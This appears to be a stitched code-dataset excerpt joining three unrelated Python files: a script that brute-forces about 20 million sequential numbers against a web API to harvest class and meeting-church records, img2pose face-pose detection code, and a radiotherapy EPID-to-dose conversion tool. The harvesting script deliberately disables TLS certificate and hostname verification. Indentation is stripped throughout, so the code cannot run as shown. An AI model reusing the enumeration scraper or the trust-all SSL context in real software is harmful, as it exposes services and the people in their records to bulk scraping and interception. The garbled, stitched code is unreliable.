bk_dir = PATH_DUMP_BK_FORMAT(timestamp)
os.rename(PATH_DUMP,bk_dir)
print "Moved {} to {}!".format(PATH_DUMP,bk_dir)
def dumpDirExist():
return os.path.exists(PATH_DUMP)
if dumpDirExist():
print "{} directory already exist".format(PATH_DUMP)
backupDumpDir()
print "Creating new {} directory".format(PATH_DUMP)
createNewDumpDir()
def harvest():
def appendNumber(fn,number):
f = open(fn, "a")
f.write("{}\n".format(number))
def writeDumpFileHeaders(dump_fn,data):
timestamp = str(datetime.now())
classDesc = data["classDesc"]
classNumber = data["classNumber"]
className = data["className"]
meetingChurch = data["meetingChurch"]
meetingTime = data["meetingTime"]
meetingDay = data["meetingDay"]
meetingChurchAddress = data["meetingChurchAddress"]
f = open(dump_fn, "w+")
f.write(FILE_DUMP_HEADERS_FORMAT(timestamp,
classNumber,
className,
classDesc,
meetingChurch,
meetingChurchAddress,
meetingDay,
meetingTime))
f.close()
def getSSLcontextTrustAllStrategy():
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
return ctx
def generateNumber(base_num,x):
return FRIST_NUMBER[base_num]*10000000 + x
def get(number):
req = urllib2.Request(HTTP_URL_FORMAT(number),headers=HTTP_HEADERS)
try:
response = urllib2.urlopen(req,context=getSSLcontextTrustAllStrategy())
except urllib2.HTTPError as e:
if e.code == 500:
time.sleep(DEFAULT_GET_DELAY_SECONDS)
print "Retrying {}..".format(number)
return get(number)
else:
return json.loads(response.read())
for base_num in range(2):
for x in range(0,9999999):
number = generateNumber(base_num,x)
print "Trying {}".format(number)
data = get(number)
if len(data) == 0:
print "NUMBER NOT IN DATABASE...\n"
continue
print "SUCCESS!! NUMBER FOUND - {} :)".format(number)
data = data[0]
classNumber = data["classNumber"]
meetingChurch = data["meetingChurch"].replace(" ", "-")
dump_fn = FILE_DUMP_PATH_FORMAT(classNumber, meetingChurch)
if not os.path.isfile(dump_fn):
writeDumpFileHeaders(dump_fn,data)
appendNumber(dump_fn,str(number))
print "Program finished :)"
return
def main():
init()
harvest()
if __name__ == '__main__':
main()
``` |
{
"source": "jiacheng1gujiaxin/poseface",
"score": 2
} |
#### File: poseface/img2pose/model_loader.py
```python
from os import path
import torch
try:
from utils.dist import is_main_process
except Exception as e:
print(e)
def save_model(fpn_model, optimizer, config, val_loss=0, step=0, model_only=False):
if is_main_process():
save_path = config.model_path
if model_only:
torch.save(
{"fpn_model": fpn_model.state_dict()},
path.join(save_path, f"model_val_loss_{val_loss:.4f}_step_{step}.pth"),
)
else:
torch.save(
{
"fpn_model": fpn_model.state_dict(),
"optimizer": optimizer.state_dict(),
},
path.join(save_path, f"model_val_loss_{val_loss:.4f}_step_{step}.pth"),
)
def load_model(fpn_model, model_path, model_only=True, optimizer=None, cpu_mode=False):
if cpu_mode:
checkpoint = torch.load(model_path, map_location="cpu")
else:
checkpoint = torch.load(model_path)
fpn_model.load_state_dict(checkpoint["fpn_model"])
if not model_only:
optimizer.load_state_dict(checkpoint["optimizer"])
```
#### File: poseface/img2pose/models.py
```python
from typing import Dict, List, Optional, Tuple
import torch
import torch.nn.functional as F
import torchvision.models.detection._utils as det_utils
from torch import nn
from torchvision.models.detection.faster_rcnn import TwoMLPHead
from torchvision.models.detection.roi_heads import RoIHeads
from torchvision.models.detection.transform import GeneralizedRCNNTransform
from torchvision.ops import MultiScaleRoIAlign
from torchvision.ops import boxes as box_ops
from .generalized_rcnn import GeneralizedRCNN
from .losses import fastrcnn_loss
from .rpn import AnchorGenerator, RegionProposalNetwork, RPNHead
from .utils.pose_operations import transform_pose_global_project_bbox
class FastRCNNDoFPredictor(nn.Module):
"""
    Pose (6-DoF) regression head for the Fast R-CNN-style ROI heads;
    predicts num_classes * 6 values per proposal.
Arguments:
in_channels (int): number of input channels
num_classes (int): number of output classes (including background)
"""
def __init__(self, in_channels, num_classes):
super(FastRCNNDoFPredictor, self).__init__()
hidden_layer = 256
self.dof_pred = nn.Sequential(
nn.Linear(in_channels, hidden_layer),
nn.BatchNorm1d(hidden_layer),
nn.ReLU(),
nn.Linear(hidden_layer, num_classes * 6),
)
def forward(self, x):
if x.dim() == 4:
assert list(x.shape[2:]) == [1, 1]
x = x.flatten(start_dim=1)
dof = self.dof_pred(x)
return dof
class FastRCNNClassPredictor(nn.Module):
"""
    Classification head for the Fast R-CNN-style ROI heads;
    predicts class scores only (no box regression).
Arguments:
in_channels (int): number of input channels
num_classes (int): number of output classes (including background)
"""
def __init__(self, in_channels, num_classes):
super(FastRCNNClassPredictor, self).__init__()
self.cls_score = nn.Linear(in_channels, num_classes)
def forward(self, x):
if x.dim() == 4:
assert list(x.shape[2:]) == [1, 1]
x = x.flatten(start_dim=1)
scores = self.cls_score(x)
return scores
class FasterDoFRCNN(GeneralizedRCNN):
def __init__(
self,
backbone,
num_classes=None,
# transform parameters
min_size=800,
max_size=1333,
image_mean=None,
image_std=None,
# RPN parameters
rpn_anchor_generator=None,
rpn_head=None,
rpn_pre_nms_top_n_train=6000,
rpn_pre_nms_top_n_test=6000,
rpn_post_nms_top_n_train=2000,
rpn_post_nms_top_n_test=1000,
rpn_nms_thresh=0.4,
rpn_fg_iou_thresh=0.5,
rpn_bg_iou_thresh=0.3,
rpn_batch_size_per_image=256,
rpn_positive_fraction=0.5,
# Box parameters
box_roi_pool=None,
box_head=None,
box_predictor=None,
box_score_thresh=0.05,
box_nms_thresh=0.5,
box_detections_per_img=1000,
box_fg_iou_thresh=0.5,
box_bg_iou_thresh=0.5,
box_batch_size_per_image=512,
box_positive_fraction=0.25,
bbox_reg_weights=None,
pose_mean=None,
pose_stddev=None,
threed_68_points=None,
threed_5_points=None,
bbox_x_factor=1.1,
bbox_y_factor=1.1,
expand_forehead=0.3,
):
if not hasattr(backbone, "out_channels"):
raise ValueError(
"backbone should contain an attribute out_channels "
"specifying the number of output channels (assumed to be the "
"same for all the levels)"
)
assert isinstance(rpn_anchor_generator, (AnchorGenerator, type(None)))
assert isinstance(box_roi_pool, (MultiScaleRoIAlign, type(None)))
if num_classes is not None:
if box_predictor is not None:
raise ValueError(
"num_classes should be None when box_predictor is specified"
)
else:
if box_predictor is None:
raise ValueError(
"num_classes should not be None when box_predictor "
"is not specified"
)
out_channels = backbone.out_channels
if rpn_anchor_generator is None:
anchor_sizes = ((16,), (32,), (64,), (128,), (256,), (512,))
aspect_ratios = ((0.5, 1.0, 2.0),) * len(anchor_sizes)
rpn_anchor_generator = AnchorGenerator(anchor_sizes, aspect_ratios)
if rpn_head is None:
rpn_head = RPNHead(
out_channels, rpn_anchor_generator.num_anchors_per_location()[0]
)
rpn_pre_nms_top_n = {
"training": rpn_pre_nms_top_n_train,
"testing": rpn_pre_nms_top_n_test,
}
rpn_post_nms_top_n = {
"training": rpn_post_nms_top_n_train,
"testing": rpn_post_nms_top_n_test,
}
rpn = RegionProposalNetwork(
rpn_anchor_generator,
rpn_head,
rpn_fg_iou_thresh,
rpn_bg_iou_thresh,
rpn_batch_size_per_image,
rpn_positive_fraction,
rpn_pre_nms_top_n,
rpn_post_nms_top_n,
rpn_nms_thresh,
)
if box_roi_pool is None:
box_roi_pool = MultiScaleRoIAlign(
featmap_names=["0", "1", "2", "3"], output_size=7, sampling_ratio=2
)
if box_head is None:
resolution = box_roi_pool.output_size[0]
representation_size = 1024
box_head = TwoMLPHead(out_channels * resolution ** 2, representation_size)
if box_predictor is None:
representation_size = 1024
box_predictor = FastRCNNDoFPredictor(representation_size, num_classes)
roi_heads = DOFRoIHeads(
# Box
box_roi_pool,
box_head,
box_predictor,
box_fg_iou_thresh,
box_bg_iou_thresh,
box_batch_size_per_image,
box_positive_fraction,
bbox_reg_weights,
box_score_thresh,
box_nms_thresh,
box_detections_per_img,
out_channels,
pose_mean=pose_mean,
pose_stddev=pose_stddev,
threed_68_points=threed_68_points,
threed_5_points=threed_5_points,
bbox_x_factor=bbox_x_factor,
bbox_y_factor=bbox_y_factor,
expand_forehead=expand_forehead,
)
if image_mean is None:
image_mean = [0.485, 0.456, 0.406]
if image_std is None:
image_std = [0.229, 0.224, 0.225]
transform = GeneralizedRCNNTransform(min_size, max_size, image_mean, image_std)
super(FasterDoFRCNN, self).__init__(backbone, rpn, roi_heads, transform)
def set_max_min_size(self, max_size, min_size):
self.min_size = (min_size,)
self.max_size = max_size
self.transform.min_size = self.min_size
self.transform.max_size = self.max_size
class DOFRoIHeads(RoIHeads):
def __init__(
self,
box_roi_pool,
box_head,
box_predictor,
# Faster R-CNN training
fg_iou_thresh,
bg_iou_thresh,
batch_size_per_image,
positive_fraction,
bbox_reg_weights,
# Faster R-CNN inference
score_thresh,
nms_thresh,
detections_per_img,
out_channels,
# Mask
mask_roi_pool=None,
mask_head=None,
mask_predictor=None,
keypoint_roi_pool=None,
keypoint_head=None,
keypoint_predictor=None,
pose_mean=None,
pose_stddev=None,
threed_68_points=None,
threed_5_points=None,
bbox_x_factor=1.1,
bbox_y_factor=1.1,
expand_forehead=0.3,
):
super(RoIHeads, self).__init__()
self.box_similarity = box_ops.box_iou
# assign ground-truth boxes for each proposal
self.proposal_matcher = det_utils.Matcher(
fg_iou_thresh, bg_iou_thresh, allow_low_quality_matches=False
)
self.fg_bg_sampler = det_utils.BalancedPositiveNegativeSampler(
batch_size_per_image, positive_fraction
)
if bbox_reg_weights is None:
bbox_reg_weights = (10.0, 10.0, 5.0, 5.0)
self.box_coder = det_utils.BoxCoder(bbox_reg_weights)
self.box_roi_pool = box_roi_pool
self.box_head = box_head
self.box_predictor = box_predictor
num_classes = 2
self.class_roi_pool = MultiScaleRoIAlign(
featmap_names=["0", "1", "2", "3"], output_size=7, sampling_ratio=2
)
resolution = box_roi_pool.output_size[0]
representation_size = 1024
self.class_head = TwoMLPHead(
out_channels * resolution ** 2, representation_size
)
self.class_predictor = FastRCNNClassPredictor(representation_size, num_classes)
self.score_thresh = score_thresh
self.nms_thresh = nms_thresh
self.detections_per_img = detections_per_img
self.mask_roi_pool = mask_roi_pool
self.mask_head = mask_head
self.mask_predictor = mask_predictor
self.keypoint_roi_pool = keypoint_roi_pool
self.keypoint_head = keypoint_head
self.keypoint_predictor = keypoint_predictor
self.pose_mean = pose_mean
self.pose_stddev = pose_stddev
self.threed_68_points = threed_68_points
self.threed_5_points = threed_5_points
self.bbox_x_factor = bbox_x_factor
self.bbox_y_factor = bbox_y_factor
self.expand_forehead = expand_forehead
def select_training_samples(
self,
proposals, # type: List[Tensor]
targets, # type: Optional[List[Dict[str, Tensor]]]
):
# type: (...) -> Tuple[List[Tensor], List[Tensor], List[Tensor], List[Tensor]]
self.check_targets(targets)
assert targets is not None
dtype = proposals[0].dtype
device = proposals[0].device
gt_boxes = [t["boxes"].to(dtype) for t in targets]
gt_labels = [t["labels"] for t in targets]
gt_dofs = [t["dofs"] for t in targets]
# append ground-truth bboxes to propos
proposals = self.add_gt_proposals(proposals, gt_boxes)
# get matching gt indices for each proposal
matched_idxs, labels = self.assign_targets_to_proposals(
proposals, gt_boxes, gt_labels
)
# sample a fixed proportion of positive-negative proposals
sampled_inds = self.subsample(labels)
matched_gt_boxes = []
matched_gt_dofs = []
num_images = len(proposals)
for img_id in range(num_images):
img_sampled_inds = sampled_inds[img_id]
proposals[img_id] = proposals[img_id][img_sampled_inds]
labels[img_id] = labels[img_id][img_sampled_inds]
matched_idxs[img_id] = matched_idxs[img_id][img_sampled_inds]
gt_boxes_in_image = gt_boxes[img_id]
gt_dofs_in_image = gt_dofs[img_id]
if gt_boxes_in_image.numel() == 0:
gt_boxes_in_image = torch.zeros((1, 4), dtype=dtype, device=device)
if gt_dofs_in_image.numel() == 0:
gt_dofs_in_image = torch.zeros((1, 4), dtype=dtype, device=device)
matched_gt_boxes.append(gt_boxes_in_image[matched_idxs[img_id]])
matched_gt_dofs.append(gt_dofs_in_image[matched_idxs[img_id]])
# regression_targets = self.box_coder.encode(matched_gt_boxes, proposals)
dof_regression_targets = matched_gt_dofs
box_regression_targets = matched_gt_boxes
return (
proposals,
matched_idxs,
labels,
dof_regression_targets,
box_regression_targets,
)
def decode(self, rel_codes, boxes):
# type: (Tensor, List[Tensor]) -> Tensor
assert isinstance(boxes, (list, tuple))
assert isinstance(rel_codes, torch.Tensor)
boxes_per_image = [b.size(0) for b in boxes]
concat_boxes = torch.cat(boxes, dim=0)
box_sum = 0
for val in boxes_per_image:
box_sum += val
pred_boxes = self.decode_single(rel_codes.reshape(box_sum, -1), concat_boxes)
return pred_boxes.reshape(box_sum, -1, 6)
def postprocess_detections(
self,
class_logits, # type: Tensor
dof_regression, # type: Tensor
proposals, # type: List[Tensor]
image_shapes, # type: List[Tuple[int, int]]
):
# type: (...) -> Tuple[List[Tensor], List[Tensor], List[Tensor]]
device = class_logits.device
num_classes = class_logits.shape[-1]
boxes_per_image = [boxes_in_image.shape[0] for boxes_in_image in proposals]
pred_boxes = torch.cat(proposals, dim=0)
N = dof_regression.shape[0]
pred_boxes = pred_boxes.reshape(N, -1, 4)
pred_dofs = dof_regression.reshape(N, -1, 6)
pred_scores = F.softmax(class_logits, -1)
pred_boxes_list = pred_boxes.split(boxes_per_image, 0)
pred_scores_list = pred_scores.split(boxes_per_image, 0)
pred_dofs_list = pred_dofs.split(boxes_per_image, 0)
all_boxes = []
all_scores = []
all_labels = []
all_dofs = []
for boxes, dofs, scores, image_shape in zip(
pred_boxes_list, pred_dofs_list, pred_scores_list, image_shapes
):
boxes = box_ops.clip_boxes_to_image(boxes, image_shape)
# create labels for each prediction
labels = torch.arange(num_classes, device=device)
labels = labels.view(1, -1).expand_as(scores)
# remove predictions with the background label
dofs = dofs[:, 1:]
scores = scores[:, 1:]
labels = labels[:, 1:]
# batch everything, by making every class prediction be a separate instance
boxes = boxes.reshape(-1, 4)
dofs = dofs.reshape(-1, 6)
scores = scores.reshape(-1)
labels = labels.reshape(-1)
# remove low scoring boxes
inds = torch.nonzero(scores > self.score_thresh).squeeze(1)
boxes, dofs, scores, labels = (
boxes[inds],
dofs[inds],
scores[inds],
labels[inds],
)
# remove empty boxes
keep = box_ops.remove_small_boxes(boxes, min_size=1e-2)
boxes, dofs, scores, labels = (
boxes[keep],
dofs[keep],
scores[keep],
labels[keep],
)
# create boxes from the predicted poses
boxes, dofs = transform_pose_global_project_bbox(
boxes,
dofs,
self.pose_mean,
self.pose_stddev,
image_shape,
self.threed_68_points,
bbox_x_factor=self.bbox_x_factor,
bbox_y_factor=self.bbox_y_factor,
expand_forehead=self.expand_forehead,
)
# non-maximum suppression, independently done per class
            keep = box_ops.batched_nms(boxes, scores, labels, self.nms_thresh)
            # keep only topk scoring predictions
            keep = keep[: self.detections_per_img]
            boxes, dofs, scores, labels = (
                boxes[keep],
                dofs[keep],
                scores[keep],
                labels[keep],
            )
all_boxes.append(boxes)
all_scores.append(scores)
all_labels.append(labels)
all_dofs.append(dofs)
return all_boxes, all_dofs, all_scores, all_labels
def forward(
self,
features, # type: Dict[str, Tensor]
proposals, # type: List[Tensor]
image_shapes, # type: List[Tuple[int, int]]
targets=None, # type: Optional[List[Dict[str, Tensor]]]
):
# type: (...) -> Tuple[List[Dict[str, Tensor]], Dict[str, Tensor]]
"""
Arguments:
features (List[Tensor])
proposals (List[Tensor[N, 4]])
image_shapes (List[Tuple[H, W]])
targets (List[Dict])
"""
if targets is not None:
for t in targets:
floating_point_types = (torch.float, torch.double, torch.half)
assert (
t["boxes"].dtype in floating_point_types
), "target boxes must of float type"
assert (
t["labels"].dtype == torch.int64
), "target labels must of int64 type"
if self.training or targets is not None:
(
proposals,
matched_idxs,
labels,
regression_targets,
regression_targets_box,
) = self.select_training_samples(proposals, targets)
else:
labels = None
regression_targets = None
matched_idxs = None
if self.training or targets is not None:
num_images = len(proposals)
dof_proposals = []
dof_regression_targets = []
box_regression_targets = []
dof_labels = []
pos_matched_idxs = []
for img_id in range(num_images):
pos = torch.nonzero(labels[img_id] > 0).squeeze(1)
dof_proposals.append(proposals[img_id][pos])
dof_regression_targets.append(regression_targets[img_id][pos])
box_regression_targets.append(regression_targets_box[img_id][pos])
dof_labels.append(labels[img_id][pos])
pos_matched_idxs.append(matched_idxs[img_id][pos])
box_features = self.box_roi_pool(features, dof_proposals, image_shapes)
box_features = self.box_head(box_features)
dof_regression = self.box_predictor(box_features)
class_features = self.class_roi_pool(features, proposals, image_shapes)
class_features = self.class_head(class_features)
class_logits = self.class_predictor(class_features)
result = torch.jit.annotate(List[Dict[str, torch.Tensor]], [])
else:
num_images = len(proposals)
box_features = self.box_roi_pool(features, proposals, image_shapes)
box_features = self.box_head(box_features)
dof_regression = self.box_predictor(box_features)
class_features = self.class_roi_pool(features, proposals, image_shapes)
class_features = self.class_head(class_features)
class_logits = self.class_predictor(class_features)
result = torch.jit.annotate(List[Dict[str, torch.Tensor]], [])
losses = {}
if self.training or targets is not None:
assert labels is not None and regression_targets is not None
# assert matched_idxs is not None
loss_classifier, loss_dof_reg, loss_points = fastrcnn_loss(
class_logits,
labels,
dof_regression,
dof_labels,
dof_regression_targets,
box_regression_targets,
dof_proposals,
image_shapes,
self.pose_mean,
self.pose_stddev,
self.threed_5_points,
)
losses = {
"loss_classifier": loss_classifier,
"loss_dof_reg": loss_dof_reg,
"loss_points": loss_points,
}
else:
boxes, dofs, scores, labels = self.postprocess_detections(
class_logits, dof_regression, proposals, image_shapes
)
num_images = len(boxes)
for i in range(num_images):
result.append(
{
"boxes": boxes[i],
"labels": labels[i],
"scores": scores[i],
"dofs": dofs[i],
}
)
return result, losses
``` |
{
"source": "Jiachengciel/The-conversion-of-radiotherapy-image-by-machine-learning",
"score": 2
} |
#### File: The-conversion-of-radiotherapy-image-by-machine-learning/Final-Code/Conversion en dose.py
```python
import time
import os
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
# ===== For Neural Network =====
import torch
import torch.nn as nn
from torch.autograd import Variable
# ===== For Random Forest =====
from sklearn import preprocessing
from sklearn.ensemble import RandomForestRegressor
from sklearn.externals import joblib
# =================Parameters===========================
# ===== For Neural Network =====
PATH_PARAMETERS_IMRT = './IMRT/checkpoint_lr5e-05_Epoch80_lambda0.0001.pth.tar'
PATH_PARAMETERS_VMAT= './VMAT/checkpoint_InNode9lr5e-05_Epoch80_lambda0.0001_VMAT_.pth.tar'
PATH_PARAMETERS_STATIC = './Static/checkpoint_lr5e-05_Epoch80_lambda0.0001.pth.tar'
# ===== For Random Forest =====
PATH_PARAMETERS_STATIC_RF = './RandomForest/RandomForest_static_1,3,5,6,7_depth_26_estimator_19_features_11.pkl'
PATH_PARAMETERS_EXACT_RF = './RandomForest/RandomForest_depth_26_estimator_19_features_11.pkl'
# ================ Basic function =======================
def normalization(arr):
"""normalize the array
Args:
arr: array
Return:
(array): normalization of the array
"""
return (arr - np.min(arr)) / (np.max(arr) - np.min(arr))
def standarization(arr):
"""standardize the array
Args:
arr: array
Return:
(array): standard of the array
"""
return (arr - np.mean(arr)) / np.std(arr)
def colorbar(image):
"""draw the colorbar of an image
Args:
image: image array
Returns:
color bar
"""
ax = image.axes
fig = ax.figure
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
return fig.colorbar(image, cax=cax)
def getPixelSize(Path):
_, pixel_size = read_information(Path)
return pixel_size
def getMaxvalue(image):
return np.max(image)
def getMinvalue(image):
return np.min(image)
# =============== Generate the image ==================
def read_information(Path):
"""Read the information of the image
Args:
Path : the path of the image
Returns:
ImPred : matrix of the image
pixel_size : pixel size of the image, [0] is pixel size on x axis, [1] is pixel size on y axis
"""
file_in = open(Path, "r")
# define a little-endian int32 type
dt = np.dtype('<i4')
# get the number of the pixel of image
DataInt = np.fromfile(file_in, dtype=dt, count=2)
Nrows = DataInt[0]
Ncols = DataInt[1]
# get the width and height of the image
Size = np.fromfile(file_in, dtype='<f', count=4)
width = Size[2] - Size[0]
height = Size[3] - Size[1]
pixel_size_x = float(width / Ncols)
pixel_size_y = float(height / Nrows)
pixel_size = [pixel_size_x, pixel_size_y]
# Read all the intensity of the image
ImData = np.fromfile(file_in, dtype='<f')
file_in.close()
# Resize to an image
ImPred = np.reshape(ImData, (Ncols, Nrows))
return ImPred, pixel_size
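# A minimal sketch (illustrative, not part of the original pipeline) of the binary
# layout read_information() expects: two little-endian int32 values (Nrows, Ncols),
# four little-endian float32 bounds, then Nrows*Ncols little-endian float32
# intensities, reshaped to (Ncols, Nrows). A toy file could be built with:
#   with open('toy.content', 'wb') as f:
#       f.write(np.array([2, 3], dtype='<i4').tobytes())        # Nrows, Ncols
#       f.write(np.array([0, 0, 3, 2], dtype='<f4').tobytes())  # bounds (x0, y0, x1, y1)
#       f.write(np.arange(6, dtype='<f4').tobytes())            # pixel intensities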
def get_image(Path, isInput=True):
""" Read the information of the images
Args:
Path : the path of the image
isInput : whether it is the input of Neural Network
Returns:
ImPred : matrix of the image
pixel_size : pixel size of the image, [0] is pixel size on x axis, [1] is pixel size on y axis
Raises:
IOError: An error occurred if it can't read the file
"""
path = []
try:
for root, dirs, files in os.walk(Path):
for file in files:
path.append(os.path.join(root, file))
        # simulation is Y (Output), acquired is X (Input)
if path[0].split('/')[-1].split('.')[0].split('_')[-1] == 'simulation':
path_X = path[1]
path_Y = path[0]
else:
path_X = path[0]
path_Y = path[1]
if isInput:
path = path_X
else:
path = path_Y
except IOError:
print("Error: Can't find the file!")
else:
ImPred, pixel_size = read_information(path)
return ImPred, pixel_size
# ===== For Neural Network =====
def generate(Path, isNormalize=False):
"""Generate all the input variables -- (9 features)
Args:
Path : the path of the image input and output
isNormalize: Normalize the input data or not
Returns:
X: input of the Neural Network
Y_: the correct result of the input
"""
Img_X, _ = read_information(Path=Path)
# Padding the Img X
# minimum value in X like zero padding
minimum = np.min(Img_X)
Img_X = np.pad(Img_X, ((1, 1), (1, 1)), 'constant', constant_values=(minimum, minimum))
if isNormalize:
Data = normalization(Img_X)
else:
Data = Img_X
# Calculate the dimension of X and Y
Ncols = Data.shape[1] - 2
Nrows = Data.shape[0] - 2
n = Ncols * Nrows
m = 9
# Initialize input X
X = np.zeros((n, m), dtype=float)
# store the position, intensities
for i in range(n):
pos_i = int(i / Ncols + 1)
pos_j = int(i % Ncols + 1)
X[i][0] = Data[pos_i][pos_j] # X(i,j)
X[i][1] = Data[pos_i - 1][pos_j - 1] # X(i-1,j-1)
X[i][2] = Data[pos_i - 1][pos_j] # X(i-1,j)
X[i][3] = Data[pos_i - 1][pos_j + 1] # X(i-1,j+1)
X[i][4] = Data[pos_i][pos_j - 1] # X(i,j-1)
X[i][5] = Data[pos_i][pos_j + 1] # X(i,j+1)
X[i][6] = Data[pos_i + 1][pos_j - 1] # X(i+1,j-1)
X[i][7] = Data[pos_i + 1][pos_j] # X(i+1,j)
X[i][8] = Data[pos_i + 1][pos_j + 1] # X(i+1,j+1)
return X
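# Worked example (illustrative): row i of X corresponds to pixel (i // Ncols,
# i % Ncols) of the unpadded image, and its 9 columns hold that pixel plus its
# 8 neighbours in the padded image, in the order used above. For a 2x2 image
# [[a, b], [c, d]] padded with its minimum value m, row 0 is
# [a, m, m, m, m, b, m, c, d].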
# ====== For Random Forest ======
def generate_RF(Path, isNormalize=False):
"""Generate all the input variables -- (18 features)
Args:
Path : the path of the image input and output
isNormalize: Normalize the input data or not
Returns:
X: input of Random Forest
"""
Img_X, _ = read_information(Path=Path)
# Padding the Img X
# minimum value in X like zero padding
minimum = np.min(Img_X)
Img_X = np.pad(Img_X, ((1, 1), (1, 1)), 'constant', constant_values=(minimum, minimum))
if isNormalize:
Data = normalization(Img_X)
else:
Data = Img_X
# Calculate the dimension of X and Y
Ncols = Data.shape[1] - 2
Nrows = Data.shape[0] - 2
n = Ncols * Nrows
m = 18
# Initialize input X
X = np.zeros((n, m), dtype=float)
# store the position, intensities
for i in range(n):
pos_i = int(i / Ncols + 1)
pos_j = int(i % Ncols + 1)
X[i][0] = Data[pos_i][pos_j] # X(i,j)
X[i][1] = Data[pos_i - 1][pos_j - 1] # X(i-1,j-1)
X[i][2] = Data[pos_i - 1][pos_j] # X(i-1,j)
X[i][3] = Data[pos_i - 1][pos_j + 1] # X(i-1,j+1)
X[i][4] = Data[pos_i][pos_j - 1] # X(i,j-1)
X[i][5] = Data[pos_i][pos_j + 1] # X(i,j+1)
X[i][6] = Data[pos_i + 1][pos_j - 1] # X(i+1,j-1)
X[i][7] = Data[pos_i + 1][pos_j] # X(i+1,j)
X[i][8] = Data[pos_i + 1][pos_j + 1] # X(i+1,j+1)
X[i][9] = X[i][0] ** 2 # X(i,j)
X[i][10] = X[i][1] ** 2 # X(i-1,j-1)
X[i][11] = X[i][2] ** 2 # X(i-1,j)
X[i][12] = X[i][3] ** 2 # X(i-1,j+1)
X[i][13] = X[i][4] ** 2 # X(i,j-1)
X[i][14] = X[i][5] ** 2 # X(i,j+1)
X[i][15] = X[i][6] ** 2 # X(i+1,j-1)
X[i][16] = X[i][7] ** 2 # X(i+1,j)
X[i][17] = X[i][8] ** 2
return X
# ===============================Neural Network=====================================================
# ======== Basic Parameters ========
INPUT_NODE = 9
HIDDEN_LAYER1_NODE = 30
HIDDEN_LAYER2_NODE = 5
HIDDEN_LAYER3_NODE = 1
OUTPUT_NODE = 1
# =================Class of Neural Network==============
class Neural_Network(nn.Module):
def __init__(self, input_dim, hidden1_dim, hidden2_dim, hidden3_dim, output_dim):
super(Neural_Network, self).__init__()
self.ANN = nn.Sequential(
# 1
nn.Linear(input_dim, hidden1_dim),
nn.Tanh(),
# 2
nn.Linear(hidden1_dim, hidden2_dim),
nn.Tanh(),
# 3
nn.Linear(hidden2_dim, hidden3_dim),
nn.Sigmoid(),
)
# Linear function for increasing value: 1 --> 1
self.out = nn.Linear(hidden3_dim, output_dim)
def forward(self, X):
y = self.ANN(X)
# Increasing the value
out = self.out(y)
return out
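# Minimal usage sketch (illustrative only): the network maps the 9 neighbourhood
# features of one pixel to a single dose value, e.g.
#   net = Neural_Network(INPUT_NODE, HIDDEN_LAYER1_NODE, HIDDEN_LAYER2_NODE,
#                        HIDDEN_LAYER3_NODE, OUTPUT_NODE)
#   dose = net(torch.randn(4, INPUT_NODE).float())   # -> tensor of shape (4, 1)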
# ================== Conversion by Neural Network =======================
def Conversion_ANN(X, isStatic=False, isVMAT=False):
"""Test for other image
Args:
X: input of the image
isStatic: is it the image static
isVMAT: is it the image VMAT
Returns:
prediction: the predict image dosimétrique of the input X
Raises:
Exception: can't find the model of Neural Network
"""
# Tensor Processing
X = torch.from_numpy(X)
# Model Basic
model = Neural_Network(INPUT_NODE, HIDDEN_LAYER1_NODE, HIDDEN_LAYER2_NODE, HIDDEN_LAYER3_NODE, OUTPUT_NODE)
# Check whether there is a model
if isStatic:
PATH_PARAMETERS = PATH_PARAMETERS_STATIC
elif isVMAT:
PATH_PARAMETERS = PATH_PARAMETERS_VMAT
else:
PATH_PARAMETERS = PATH_PARAMETERS_IMRT
IsExists = os.path.exists(PATH_PARAMETERS)
if IsExists:
print("Model exists, begin test!!!")
# Get the Parameters of Model
checkpoint = torch.load(PATH_PARAMETERS)
model.load_state_dict(checkpoint['model_state_dict'])
else:
print("No model, try to find it!!!")
return None
# Predict the Target
prediction = model(X.float())
return prediction.detach().numpy()
def get_results_ANN(path, isStatic=False, isVMAT=False):
"""Get all the result of the test
Args:
path: path of the image EPID
isStatic: conversion for image static (true or false)
isStatic: conversion for image VMAT (true or false)
Returns:
Accuracy: a text file storing the gamma index of all the test images
Comparision Image: the predict image, the gamma index immage and the origin image
Raises:
IOError: An error occurred if it can't read the file
"""
# Basic for Normalization of the test image
if isStatic:
        Init_Array = np.load('./Static/Init.npz')
elif isVMAT:
Init_Array = np.load('./VMAT/Init_InNode9lr5e-05_Epoch80_lambda0.0001_VMAT_.npz')
else:
Init_Array = np.load('./IMRT/Init_lr5e-05_Epoch80_lambda0.0001_9_10_11_14_21_22_.npz')
ranges = Init_Array['Ranges']
minValues = Init_Array['MinValues']
X = generate(Path=path, isNormalize=False)
X = (X - minValues) / ranges
# Prediction with Model
Y_pre = Conversion_ANN(X, isStatic, isVMAT)
return Y_pre
# ================================================ Random Forest =======================================================
# =================Conversion by Random Forest===============
def Conversion_RF(X, isStatic=False):
"""Test for other image
Args:
X: input of the image
Returns:
y_pred: the predict image y of the input X
Raises:
Exception: can't find the model of Neural Network
"""
# Check whether there is a model
if isStatic:
PATH_PARAMETERS = PATH_PARAMETERS_STATIC_RF
else:
PATH_PARAMETERS = PATH_PARAMETERS_EXACT_RF
IsExists = os.path.exists(PATH_PARAMETERS)
if IsExists:
print("Model exists, begin test!!!")
# Get the Parameters of Model
clf = joblib.load(PATH_PARAMETERS)
else:
print("No model, try to find it!!!")
return None
# Predict the Target
prediction = clf.predict(X)
return prediction
def get_results_RF(path, isStatic=False):
"""Get all the result of the test
Args:
isStatic: test for image static or image exact (true or false)
Returns:
Accuracy: a text file storing the gamma index of all the test images
Comparision Image: the predict image, the gamma index immage and the origin image
Raises:
IOError: An error occurred if it can't read the file
"""
# Get the information of images
X = generate_RF(path, isNormalize=False)
# Prediction with Model
Y_pre = Conversion_RF(X, isStatic)
return Y_pre
# ========================================== Main Function =============================================================
def main(Path_Image, isANN, Static, VMAT):
"""La conversion de l'image EPID en image dosimétrique
Args:
Path_Image: the path of the image EPID
isANN: Use the model of ANN or not (True or False)
Static: the image is static or not (True or False)
        VMAT: the image is VMAT or not (True or False)
Returns:
        Image_dose: the dose image
"""
X = read_information(Path_Image)[0]
if Static and VMAT:
print("VMAT can't be Static the same time!")
if isANN:
Y = get_results_ANN(Path_Image, isStatic=Static, isVMAT=VMAT)
else:
Y = get_results_RF(Path_Image, isStatic=Static)
Image_dose = np.reshape(Y, X.shape)
    # ===== plot =====
fig = plt.figure()
